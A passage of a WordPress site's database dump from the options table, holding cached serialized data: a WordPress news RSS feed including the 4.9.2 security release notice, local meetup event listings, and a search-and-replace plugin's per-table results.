WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5541";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:339:"Things got off to a gradual start in 2018 with momentum starting to pick up over the course of the month. There were some notable developments in January, including a new point release and work being done on other important areas of the WordPress project. WordPress 4.9.2 Security and Maintenance Release On January 16, WordPress [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3840:"<p>Things got off to a gradual start in 2018 with momentum starting to pick up over the course of the month. There were some notable developments in January, including a new point release and work being done on other important areas of the WordPress project.</p>\n\n<hr class="wp-block-separator" />\n\n<h2>WordPress 4.9.2 Security and Maintenance Release</h2>\n\n<p>On January 16, <a href="https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/">WordPress 4.9.2 was released</a> to fix an important security issue with the media player, as well as a number of other smaller bugs. This release goes a long way to smoothing out the 4.9 release cycle with the next point release, v4.9.3, <a href="https://make.wordpress.org/core/2018/01/31/wordpress-4-9-3-release-pushed-to-february-5th/">due in early February</a>.</p>\n\n<p>To get involved in building WordPress Core, jump into the #core channel in the<a href="https://make.wordpress.org/chat/"> Making WordPress Slack group</a>, and follow<a href="https://make.wordpress.org/core/"> the Core team blog</a>.</p>\n\n<h2>Updated Plugin Directory Guidelines</h2>\n\n<p>At the end of 2017, <a href="https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/">the guidelines for the Plugin Directory</a> received a significant update to make them clearer and expanded to address certain situations. This does not necessarily make these guidelines complete, but rather more user-friendly and practical; they govern how developers build plugins for the Plugin Directory, so they need to evolve with the global community that the Directory serves.</p>\n\n<p>If you would like to contribute to these guidelines, you can make a pull request to <a href="https://github.com/WordPress/wporg-plugin-guidelines">the GitHub repository</a> or email <a href="mailto:plugins@wordpress.org">plugins@wordpress.org</a>. You can also jump into the #pluginreview channel in the<a href="https://make.wordpress.org/chat/"> Making WordPress Slack group</a>.</p>\n\n<hr class="wp-block-separator" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>Near the end of last year a lot of work was put into improving the standards in the WordPress core codebase and now <a href="https://make.wordpress.org/core/2017/11/30/wordpress-php-now-mostly-conforms-to-wordpress-coding-standards/">the entire platform is at nearly 100% compliance with the WordPress coding standards</a>.</li>\n    <li>Gutenberg, the new editor coming to WordPress core in the next major release, <a href="https://make.wordpress.org/core/2018/01/25/whats-new-in-gutenberg-25th-january/">was updated to v2.1 this month</a> with some great usability and technical improvements.</li>\n    <li>The Global Community Team is <a href="https://make.wordpress.org/community/2018/01/16/2018-goals-for-the-global-community-team-suggestions-time/">taking suggestions for the goals of the Community program in 2018</a>.</li>\n    <li><a href="https://online.wpcampus.org/">WPCampus Online</a>, a digital conference focused on WordPress in higher education, took place on January 30. The videos of the event sessions will be online soon.</li>\n    <li>A WordPress community member <a href="https://wptavern.com/new-toolkit-simplifies-the-process-of-creating-gutenberg-blocks">has released a toolkit</a> to help developers build blocks for Gutenberg.</li>\n    <li>The community team that works to improve the WordPress hosting experience is relatively young, but <a href="https://make.wordpress.org/hosting/2018/01/25/hosting-meeting-notes-january-10-2018/">they have been making some great progress recently</a>.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href="https://make.wordpress.org/community/month-in-wordpress-submissions/">submit it here</a>.</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5541";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:48:"WordPress 4.9.2 Security and Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:84:"https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 16 Jan 2018 23:00:14 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:3:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"Security";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:3:"4.9";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=5376";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:360:"WordPress 4.9.2 is now available. This is a security and maintenance release for all versions since WordPress 3.7﻿. We strongly encourage you to update your sites immediately. An XSS vulnerability was discovered in the Flash fallback files in MediaElement, a library that is included with WordPress. Because the Flash files are no longer needed for [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ian Dunn";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3946:"<p>WordPress 4.9.2 is now available. This is a <strong>security and maintenance release</strong> for all versions since WordPress 3.7﻿. We strongly encourage you to update your sites immediately.</p>\n\n<p>An XSS vulnerability was discovered in the Flash fallback files in MediaElement, a library that is included with WordPress. Because the Flash files are no longer needed for most use cases, they have been removed from WordPress.</p>\n\n<p>MediaElement has released a new version that contains a fix for the bug, and <a href="https://wordpress.org/plugins/mediaelement-flash-fallbacks/">a WordPress plugin containing the fixed files</a> is available in the plugin repository.</p>\n\n<p>Thank you to the reporters of this issue for practicing <a href="https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/">responsible security disclosure</a>: <a href="https://opnsec.com">Enguerran Gillier</a> and <a href="https://widiz.com/">Widiz﻿</a>.</p>\n\n<p>21 other bugs were fixed in WordPress 4.9.2. Particularly of note were:</p>\n\n<ul>\n    <li>JavaScript errors that prevented saving posts in Firefox have been fixed.</li>\n    <li>The previous taxonomy-agnostic behavior of <code>get_category_link()</code> and <code>category_description()</code> was restored.</li>\n    <li>Switching themes will now attempt to restore previous widget assignments, even when there are no sidebars to map.<br /></li>\n</ul>\n\n<p>The Codex has <a href="https://codex.wordpress.org/Version_4.9.2">more information about all of the issues fixed in 4.9.2</a>, if you&#x27;d like to learn more.</p>\n\n<p>﻿<a href="https://wordpress.org/download/"></a><a href="https://wordpress.org/download/">Download WordPress 4.9.2</a> or venture over to Dashboard → Updates and click &quot;Update Now.&quot; Sites that support automatic background updates are already beginning to update automatically.</p>\n\n<p>Thank you to everyone who contributed to WordPress 4.9.2:</p>\n\n<p><a href="https://profiles.wordpress.org/0x6f0/">0x6f0</a>, <a href="https://profiles.wordpress.org/jorbin/">Aaron Jorbin</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/aduth/">Andrew Duthie</a>, <a href="https://profiles.wordpress.org/azaozz/">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/blobfolio/">Blobfolio</a>, <a href="https://profiles.wordpress.org/boonebgorges/">Boone Gorges</a>, <a href="https://profiles.wordpress.org/icaleb/">Caleb Burks</a>, <a href="https://profiles.wordpress.org/poena/">Carolina Nymark</a>, <a href="https://profiles.wordpress.org/chasewg/">chasewg</a>, <a href="https://profiles.wordpress.org/chetan200891/">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/dd32/">Dion Hulse</a>, <a href="https://profiles.wordpress.org/hardik-amipara/">Hardik Amipara</a>, <a href="https://profiles.wordpress.org/ionvv/">ionvv</a>, <a href="https://profiles.wordpress.org/jaswrks/">Jason Caldwell</a>, <a href="https://profiles.wordpress.org/jbpaul17/">Jeffrey Paul</a>, <a href="https://profiles.wordpress.org/jeremyfelt/">Jeremy Felt</a>, <a href="https://profiles.wordpress.org/joemcgill/">Joe McGill</a>, <a href="https://profiles.wordpress.org/johnschulz/">johnschulz</a>, <a href="https://profiles.wordpress.org/juiiee8487/">Juhi Patel</a>, <a href="https://profiles.wordpress.org/obenland/">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/markjaquith/">Mark Jaquith</a>, <a href="https://profiles.wordpress.org/rabmalin/">Nilambar Sharma</a>, <a href="https://profiles.wordpress.org/peterwilsoncc/">Peter Wilson</a>, <a href="https://profiles.wordpress.org/rachelbaker/">Rachel Baker</a>, <a href="https://profiles.wordpress.org/rinkuyadav999/">Rinku Y</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, and <a href="https://profiles.wordpress.org/westonruter/">Weston Ruter</a>.﻿<strong></strong><br /></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"5376";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:4:"href";s:32:"https://wordpress.org/news/feed/";s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:9:"\n	hourly	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:4:"\n	1	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:4:"site";a:1:{i:0;a:5:{s:4:"data";s:8:"14607090";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:9:{s:6:"server";s:5:"nginx";s:4:"date";s:29:"Tue, 01 May 2018 02:12:42 GMT";s:12:"content-type";s:34:"application/rss+xml; charset=UTF-8";s:25:"strict-transport-security";s:11:"max-age=360";s:6:"x-olaf";s:3:"⛄";s:13:"last-modified";s:29:"Fri, 20 Apr 2018 21:07:41 GMT";s:4:"link";s:63:"<https://wordpress.org/news/wp-json/>; rel="https://api.w.org/"";s:15:"x-frame-options";s:10:"SAMEORIGIN";s:4:"x-nc";s:9:"HIT ord 1";}}s:5:"build";s:14:"20140216132046";}', 'no');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(108874, '_site_transient_timeout_community-events-00d63db9d2c42fe194096e1bf60752d8', '1525183962', 'no'),
(108875, '_site_transient_community-events-00d63db9d2c42fe194096e1bf60752d8', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:19:"2601:643:c000:b35::";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:31:"WordPress Wednesdays Santa Rosa";s:3:"url";s:54:"https://www.meetup.com/wordpresswest/events/249712410/";s:6:"meetup";s:14:"WordPress West";s:10:"meetup_url";s:37:"https://www.meetup.com/wordpresswest/";s:4:"date";s:19:"2018-05-02 11:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Santa Rosa, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:38.445945999999999;s:9:"longitude";d:-122.72060399999999;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:31:"WordPress Wednesdays Santa Rosa";s:3:"url";s:54:"https://www.meetup.com/wordpresswest/events/250123108/";s:6:"meetup";s:14:"WordPress West";s:10:"meetup_url";s:37:"https://www.meetup.com/wordpresswest/";s:4:"date";s:19:"2018-05-09 11:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Santa Rosa, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:38.445945999999999;s:9:"longitude";d:-122.72060399999999;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:31:"WordPress Wednesdays Santa Rosa";s:3:"url";s:57:"https://www.meetup.com/wordpresswest/events/bgzbppyxhbvb/";s:6:"meetup";s:14:"WordPress West";s:10:"meetup_url";s:37:"https://www.meetup.com/wordpresswest/";s:4:"date";s:19:"2018-05-16 11:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Santa Rosa, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:38.445945999999999;s:9:"longitude";d:-122.72060399999999;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:76:"WordPress Wednesdays Workshop #3: What WordPress Devs Need to Know about SEO";s:3:"url";s:54:"https://www.meetup.com/wordpresswest/events/249445049/";s:6:"meetup";s:14:"WordPress West";s:10:"meetup_url";s:37:"https://www.meetup.com/wordpresswest/";s:4:"date";s:19:"2018-05-16 19:30:00";s:8:"location";a:4:{s:8:"location";s:19:"Santa Rosa, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:38.445945999999999;s:9:"longitude";d:-122.72060399999999;}}i:4;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:43:"Developing a Color Palette for Your Website";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/248704680/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2018-05-20 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}}}', 'no'),
(108516, '_transient_timeout_bsr_results', '1524102337', 'no'),
(108517, '_transient_bsr_results', 'a:9:{s:10:"search_for";s:62:"/wp-content/uploads/2014/12/Clear-Your-Beliefs-eBook-v.4.0.pdf";s:12:"replace_with";s:75:"https://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf";s:7:"dry_run";s:3:"off";s:16:"case_insensitive";s:3:"off";s:13:"replace_guids";s:3:"off";s:6:"change";i:1;s:7:"updates";i:1;s:13:"table_reports";a:66:{s:10:"WSP_Orders";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015882.877269;s:3:"end";d:1524015882.878562;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:23:"cyb_addonlibrary_addons";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015883.5058861;s:3:"end";d:1524015883.513592;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:27:"cyb_addonlibrary_categories";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015884.208107;s:3:"end";d:1524015884.2098401;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:15:"cyb_commentmeta";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015884.8748741;s:3:"end";d:1524015884.877301;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:12:"cyb_comments";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015885.638906;s:3:"end";d:1524015885.6480031;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:13:"cyb_formmaker";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015886.741385;s:3:"end";d:1524015886.747767;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:21:"cyb_formmaker_blocked";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015887.3272879;s:3:"end";d:1524015887.32863;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:19:"cyb_formmaker_query";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015888.1855681;s:3:"end";d:1524015888.1871049;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:22:"cyb_formmaker_sessions";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015888.8807981;s:3:"end";d:1524015888.882623;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:21:"cyb_formmaker_submits";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015889.8440239;s:3:"end";d:1524015889.8460109;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:20:"cyb_formmaker_themes";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015890.7346849;s:3:"end";d:1524015890.7489271;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:19:"cyb_formmaker_views";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015891.5216;s:3:"end";d:1524015891.5238099;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:18:"cyb_itsec_lockouts";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015892.253922;s:3:"end";d:1524015892.2574241;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:13:"cyb_itsec_log";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015892.987361;s:3:"end";d:1524015893.4228311;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:14:"cyb_itsec_temp";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015894.1053591;s:3:"end";d:1524015894.123266;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:9:"cyb_links";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015894.899375;s:3:"end";d:1524015894.9018819;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:11:"cyb_options";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015895.6560309;s:3:"end";d:1524015895.8405139;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:12:"cyb_postmeta";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015896.569958;s:3:"end";d:1524015897.1990981;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:9:"cyb_posts";a:6:{s:6:"change";i:1;s:7:"updates";i:1;s:5:"start";d:1524015897.7904899;s:3:"end";d:1524015898.5611961;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:23:"cyb_products_brandsmeta";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015899.174876;s:3:"end";d:1524015899.1778209;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:27:"cyb_products_categoriesmeta";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015899.874824;s:3:"end";d:1524015899.87696;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:22:"cyb_term_relationships";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015900.7072649;s:3:"end";d:1524015900.7454231;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:17:"cyb_term_taxonomy";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015901.567554;s:3:"end";d:1524015901.594697;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:12:"cyb_termmeta";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015902.6316881;s:3:"end";d:1524015902.67084;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:9:"cyb_terms";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015903.3950181;s:3:"end";d:1524015903.4748411;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:12:"cyb_toe_cart";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015904.346417;s:3:"end";d:1524015904.353797;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:19:"cyb_toe_content_img";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015905.1632409;s:3:"end";d:1524015905.16817;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:17:"cyb_toe_countries";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015905.7841189;s:3:"end";d:1524015905.7921481;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:16:"cyb_toe_currency";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015906.609345;s:3:"end";d:1524015906.613682;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:18:"cyb_toe_ef_options";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015907.5890911;s:3:"end";d:1524015907.630223;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:14:"cyb_toe_ef_val";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015908.4753489;s:3:"end";d:1524015908.4800301;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:23:"cyb_toe_email_templates";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015909.1869659;s:3:"end";d:1524015909.1895599;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:19:"cyb_toe_extrafields";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015910.0240741;s:3:"end";d:1524015910.0636771;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:16:"cyb_toe_htmltype";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015910.9195321;s:3:"end";d:1524015910.9226389;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:18:"cyb_toe_img_status";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015911.8456221;s:3:"end";d:1524015911.8480949;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:11:"cyb_toe_log";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015912.6178949;s:3:"end";d:1524015912.620254;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:15:"cyb_toe_modules";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015913.3883581;s:3:"end";d:1524015913.3940229;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:20:"cyb_toe_modules_type";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015913.9824231;s:3:"end";d:1524015913.984937;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:15:"cyb_toe_options";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015914.9171529;s:3:"end";d:1524015914.92257;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:26:"cyb_toe_options_categories";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015915.6764579;s:3:"end";d:1524015915.678391;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:14:"cyb_toe_orders";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015916.458463;s:3:"end";d:1524015916.4613349;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:20:"cyb_toe_orders_items";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015917.289027;s:3:"end";d:1524015917.291615;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:21:"cyb_toe_product_files";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015917.994365;s:3:"end";d:1524015917.997292;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:27:"cyb_toe_product_files_types";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015918.6708641;s:3:"end";d:1524015918.6727071;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:16:"cyb_toe_products";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015919.274133;s:3:"end";d:1524015919.277523;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:23:"cyb_toe_products_fields";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015920.077481;s:3:"end";d:1524015920.080426;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:31:"cyb_toe_products_fields_options";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015920.9233019;s:3:"end";d:1524015920.9256921;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:37:"cyb_toe_products_fields_to_categories";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015921.5783479;s:3:"end";d:1524015921.5783491;s:6:"errors";a:0:{}s:7:"skipped";b:1;}s:35:"cyb_toe_products_fields_to_products";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015922.1550519;s:3:"end";d:1524015922.1550529;s:6:"errors";a:0:{}s:7:"skipped";b:1;}s:14:"cyb_toe_rating";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015922.9479899;s:3:"end";d:1524015922.950177;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:22:"cyb_toe_related_widget";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015923.688798;s:3:"end";d:1524015923.6921871;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:16:"cyb_toe_shipping";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015924.4797771;s:3:"end";d:1524015924.483341;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:14:"cyb_toe_states";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015925.2103751;s:3:"end";d:1524015925.2144361;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:19:"cyb_toe_subscribers";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015926.0407231;s:3:"end";d:1524015926.048692;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:13:"cyb_toe_taxes";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015926.6588669;s:3:"end";d:1524015926.660898;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:18:"cyb_toe_usage_stat";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015927.4309311;s:3:"end";d:1524015927.4339581;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:18:"cyb_toe_user_files";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015928.189151;s:3:"end";d:1524015928.1916821;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:18:"cyb_toe_variations";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015928.9296589;s:3:"end";d:1524015928.9328091;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:12:"cyb_usermeta";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015929.588069;s:3:"end";d:1524015932.8933699;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:9:"cyb_users";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015933.660363;s:3:"end";d:1524015934.0336821;s:6:"errors";a:0:{}s:7:"skipped";b:0;}s:31:"cyb_visual_form_builder_entries";a:6:{s:6:"change";i:0;s:7:"updates";i:0;s:5:"start";d:1524015934.8342879;s:3:"end";d:1524015934.8429551;s:6:"errors";a:0: